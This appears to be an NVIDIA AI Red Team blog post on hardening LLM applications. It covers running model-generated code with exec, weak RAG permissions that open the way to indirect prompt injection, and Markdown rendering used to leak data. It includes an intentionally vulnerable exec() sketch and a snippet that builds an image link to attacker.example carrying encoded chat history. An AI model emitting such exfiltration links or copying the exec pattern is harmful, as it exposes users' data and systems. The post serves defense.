Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.
Common findings
In this post, we share key findings from those assessments and explain how to mitigate the most significant risks.
Vulnerability 1: Executing LLM-generated code can lead to remote code execution
One of the most serious and recurring issues is the use of functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they are sometimes extended to more complex tasks, such as performing mathematical calculations, constructing SQL queries, or generating code for data analysis.
The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.
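To make the pattern concrete, here is a minimal, hypothetical sketch of the vulnerable shape we typically find; the function and variable names are ours, not taken from any specific assessment:

```python
# Hypothetical, vulnerable pattern (illustration only).
# `llm_generated_code` is whatever the model returned for a plotting or
# data-analysis request. If an attacker's prompt injection shaped that output,
# exec() hands them code execution inside the application environment.

def run_llm_code(llm_generated_code: str) -> None:
    exec(llm_generated_code)  # do not do this: no isolation, no allowlist
```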


The fix here is clear: avoid using exec, eval, or similar constructs, especially on LLM-generated code. These functions are inherently dangerous, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval are nested deep within a library and potentially protected by guardrails, an attacker can wrap their malicious command in layers of evasion and obfuscation.
In Figure 1, a prompt injection gains RCE by wrapping the final payload (pink) in guardrail evasions (shown in green) and prompt engineering around the system prompts introduced by calls within the library (blue and orange).
Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is needed, make sure it runs in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.
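The following is a minimal sketch of the allowlist approach, assuming a JSON-style intent format and tool names we chose for illustration:

```python
import ast
import json
import operator

def safe_calculate(expression: str):
    """Evaluate a purely arithmetic expression without exec or eval."""
    ops = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}

    def walk(node):
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        raise ValueError("disallowed expression")

    return walk(ast.parse(expression, mode="eval").body)

# The model can only ever select from this explicit allowlist.
ALLOWED_FUNCTIONS = {"calculate": safe_calculate}

def dispatch(llm_response: str):
    """Parse the model's declared intent and map it to a permitted function."""
    intent = json.loads(llm_response)  # e.g. '{"function": "calculate", "args": {"expression": "2*(3+4)"}}'
    name = intent.get("function")
    if name not in ALLOWED_FUNCTIONS:
        raise ValueError(f"model requested a function not on the allowlist: {name!r}")
    return ALLOWED_FUNCTIONS[name](**intent.get("args", {}))
```

The key design choice is that the model never supplies code, only a choice from a fixed menu of operations the application already trusts.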
Vulnerability 2: Insecure access control in retrieval-augmented generation data sources
Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that allows applications to incorporate up-to-date external data without retraining the model. The retrieval step, however, can also be a vector for attackers to inject data. In practice, we see two major weaknesses related to RAG use.
First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they should not be able to see. We commonly see this happen in the following ways:
- The permissions in the original source of the data (e.g., Confluence, Google Workspace) have not been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
- The RAG data store does not faithfully reproduce source-specific permissions, often because an over-permissioned "read" token is used to access the original source of the documents.
- Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.
Reviewing how delegated authorization to the document or data sources is managed can help catch this issue early so that teams can design around it.
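One way to make the per-user check concrete is to enforce it at query time rather than trusting ingestion-time permissions alone. The sketch below assumes each chunk was stored with an allowed_users metadata field copied from the source ACL; the `index.search` call is a stand-in for whatever vector search your RAG stack actually uses:

```python
from dataclasses import dataclass, field

@dataclass
class Chunk:
    text: str
    source: str
    allowed_users: set[str] = field(default_factory=set)  # copied from the source ACL at ingestion

def retrieve_for_user(index, query: str, user_id: str, k: int = 5) -> list[Chunk]:
    """Return only chunks the calling user is permitted to read.

    Over-fetch, then enforce the ACL here, so a stale or missing filter in the
    vector store does not silently expose documents to the wrong user.
    """
    candidates = index.search(query, k=k * 4)
    permitted = [c for c in candidates if user_id in c.allowed_users]
    return permitted[:k]
```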
The other serious vulnerability we commonly see is broad write access to the RAG data store. For example, if a user's emails are part of the data in the retrieval phase of a RAG pipeline, anyone who can email that user can have their content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a particular topic to exfiltrating the user's personal documents or data.
Mitigating broad write access to the RAG data store can be quite difficult, because it often impacts the desired functionality of the application. For instance, being able to summarize a day's worth of email is a potentially valuable and important use case. In this case, mitigation must occur elsewhere in the application or be designed around the particular application requirements.
In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results can be a useful approach. In the case of workspace documents (e.g., SharePoint, Google Workspace), letting a user choose between only their own documents, documents only from people in their organization, and all documents can help limit the impact of maliciously shared documents.
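A sketch of that kind of scoping, using scope names and metadata fields we invented for illustration:

```python
from enum import Enum

class RetrievalScope(Enum):
    MY_DOCUMENTS = "my_documents"
    MY_ORGANIZATION = "my_organization"
    ALL_SHARED = "all_shared"

def in_scope(doc_metadata: dict, scope: RetrievalScope, user_id: str, org_id: str) -> bool:
    """Decide whether a document may be retrieved under the user-selected scope.

    Assumes each document was ingested with `owner_id`, `org_id`, and
    `external` metadata fields; adjust to whatever your pipeline records.
    """
    if doc_metadata.get("external") and scope is not RetrievalScope.ALL_SHARED:
        return False  # e.g. external email kept out of the default retrieval path
    if scope is RetrievalScope.MY_DOCUMENTS:
        return doc_metadata.get("owner_id") == user_id
    if scope is RetrievalScope.MY_ORGANIZATION:
        return doc_metadata.get("org_id") == org_id
    return True
```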
Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they are in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.
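One form such a guardrail check can take is a simple topical-relevance filter on each retrieved chunk before it is added to the augmented prompt. This sketch assumes you supply an `embed` callable from whatever sentence-embedding model you already use, and the threshold is illustrative:

```python
import math
from typing import Callable, Sequence

def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b)))

def on_topic(query: str, chunks: list[str],
             embed: Callable[[str], Sequence[float]],
             threshold: float = 0.3) -> list[str]:
    """Drop retrieved chunks that are not plausibly about the user's query."""
    q_vec = embed(query)
    return [c for c in chunks if cosine(q_vec, embed(c)) >= threshold]
```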
Vulnerability 3: Active content rendering of LLM outputs
The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.
By appending content to a link or image URL that directs the user's browser to an attacker's server, that content will appear in the logs of the attacker's server if the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker's domain to fetch the image data, and that same network call can also carry encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user's conversation history into a link, resulting in data exfiltration.
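To make the mechanism concrete, the snippet below constructs the kind of Markdown image an injected instruction might coax the model into emitting; the attacker domain, file name, and query parameter are placeholders:

```python
import base64
from urllib.parse import quote

# Sensitive context visible to the model (illustrative only).
conversation = "user: my account number is ...\nassistant: noted"
payload = base64.urlsafe_b64encode(conversation.encode()).decode()

# If the chat UI renders this image, the browser fetches the URL and the
# encoded conversation lands in the attacker's server logs.
markdown = f"![loading](https://attacker.example/pixel.png?q={quote(payload)})"
print(markdown)
```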


Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. The link shown could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string.
click here to learn more!


To mitigate this vulnerability, we recommend one or more of the following:
- Use image content security policies that only allow images to be loaded from a predetermined list of "safe" sites. This prevents the user's browser from automatically rendering images from an attacker's servers.
- For active hyperlinks, the application should display the full link to the user before connecting to an external site, or links should be "inactive," requiring a copy-paste operation to access the domain.
- Sanitize all LLM output to remove Markdown, HTML, URLs, or other potentially active content that is generated dynamically by the LLM (see the sketch after this list).
- As a last resort, disable active content entirely within the user interface.
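As one illustration of the sanitization option from the list above, here is a minimal sketch that strips Markdown images from untrusted hosts and renders links inactive with their full destination shown; the allowlisted host is a placeholder, and a production filter would also need to handle raw HTML and bare URLs:

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"assets.example.com"}  # placeholder allowlist

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def sanitize(llm_output: str) -> str:
    """Drop images from untrusted hosts and neutralize hyperlinks in model output."""
    def image_filter(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else ""

    def link_to_text(match: re.Match) -> str:
        # Render the link inactive and show the full destination to the user.
        return f"{match.group(1)} ({match.group(2)})"

    cleaned = MD_IMAGE.sub(image_filter, llm_output)
    return MD_LINK.sub(link_to_text, cleaned)
```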
Conclusion
The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them. Our top three findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these issues, you can secure your LLM implementation against the most common and impactful vulnerabilities.
If you're interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.
